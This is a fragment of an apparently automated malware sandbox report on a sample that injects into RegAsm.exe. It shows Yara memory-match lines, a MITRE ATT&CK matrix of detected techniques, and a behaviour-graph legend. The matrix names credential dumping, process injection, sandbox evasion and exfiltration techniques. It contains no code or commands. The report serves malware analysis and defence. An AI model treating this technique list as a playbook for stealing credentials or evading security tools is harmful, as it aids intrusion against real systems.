            Source: Yara matchFile source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential DumpingSecurity Software Discovery521Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery214VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 483511